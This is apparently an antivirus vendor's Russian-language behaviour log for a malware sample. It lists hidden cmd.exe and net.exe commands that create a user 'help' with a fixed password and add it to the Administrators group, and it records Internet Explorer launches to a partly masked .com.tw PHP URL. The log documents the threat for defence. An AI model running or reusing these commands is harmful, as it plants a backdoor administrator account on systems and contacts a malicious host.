Техническая информация
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://sh##.#injet.com.tw/languages/zh_cn/cron/1.php
- DNS ASK sh##.#injet.com.tw
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c net user help 123adminok /add' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrators help /add' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start iexplore.exe http://sh##.#injet.com.tw/languages/zh_cn/cron/1.php' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c net user help 123adminok /add
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrators help /add
- '<SYSTEM32>\cmd.exe' /c start iexplore.exe http://sh##.#injet.com.tw/languages/zh_cn/cron/1.php
- '<SYSTEM32>\net.exe' user help 123adminok /add
- '<SYSTEM32>\net.exe' localgroup Administrators help /add
- '<SYSTEM32>\net1.exe' user help 123adminok /add
- '<SYSTEM32>\net1.exe' localgroup Administrators help /add